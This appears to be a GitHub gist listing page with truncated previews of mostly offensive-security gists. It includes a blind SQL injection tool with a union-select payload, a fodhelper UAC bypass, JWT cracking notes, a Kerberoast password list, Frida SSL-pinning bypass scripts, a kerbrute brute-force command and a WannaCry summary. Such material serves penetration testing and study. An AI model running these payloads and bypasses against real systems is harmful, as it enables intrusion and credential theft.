Skip to content

Instantly share code, notes, and snippets.

@ltouroumov
ltouroumov / bbs.py
Last active July 13, 2020 13:56
Blind Binary Search (A tool for blind SQL injection)
#!/usr/bin/env python3
# bbs.py - Blind Binary Search
# Author: Laureline David
#
# Sample Usage:
#
# ./bbs.py --method POST
# --true-url http://website.com/login
# --url http://website.com/login
# --len "login=%27+union+select+login+from+users+where+length%28login%29+%3c%3d+{:d}+#&pass=abc"

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@netbiosX
netbiosX / FodhelperUACBypass.ps1
Last active May 20, 2024 04:49
Bypass UAC via Fodhelper binary in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
@decidedlygray
decidedlygray / ModifyAndBuildingBurpExtensions.md
Created August 10, 2017 00:58
Modifying and Building Burp Extensions Quick Reference

Quick Reference

This section is a boiled down version of everything above. It should serve as an easy reference. These steps assume you've identified and installed the correct JDK.

Modify and Re-Jar Extension

  1. Locate the jar file: Extender > Extensions > Select extension > Details. bapps\ directory is located at C:\Users\yourusername\AppData\Roaming\BurpSuite\bapps
  2. Backup the original jar file to a different folder, outside of bapps.
  3. Change extension from .jar to .zip, extract contents, delete .zip file
  4. Make your modifications
  5. Re-jar: jar cvf yourJarName.jar -C extractedContentsDirectory/ .
@tombigel
tombigel / README.md
Last active June 3, 2024 00:19 — forked from a2ikm/limit.maxfiles.plist
How to Change Open Files Limit on OS X and macOS Sierra (10.8 - 10.12)

How to Change Open Files Limit on OS X and macOS

This text is the section about OS X Yosemite (which also works for macOS Sierra) from https://docs.basho.com/riak/kv/2.1.4/using/performance/open-files-limit/#mac-os-x

The last time i visited this link it was dead (403), so I cloned it here from the latest snapshot in Archive.org's Wayback Machine https://web.archive.org/web/20170523131633/https://docs.basho.com/riak/kv/2.1.4/using/performance/open-files-limit/

Mac OS X

To check the current limits on your Mac OS X system, run:

@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
@edermi
edermi / kerberoast_pws.xz
Last active January 22, 2024 12:40
edermi Kerberoast PW list (XZ format)
This file has been truncated, but you can view the full file.
@akabe1
akabe1 / frida_universal_pinning_bypasser.js
Last active April 10, 2024 14:25
Another universal ssl certificate pinning bypass script for Android
/* Another universal ssl certificate pinning bypass script for Android
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_universal_pinning_bypasser.js --no-pause
*/
setTimeout(function() {
Java.perform(function() {
console.log('');
@akabe1
akabe1 / frida_multiple_unpinning.js
Last active June 9, 2024 04:11
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause]
*/
setTimeout(function() {
Java.perform(function() {
console.log('');
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: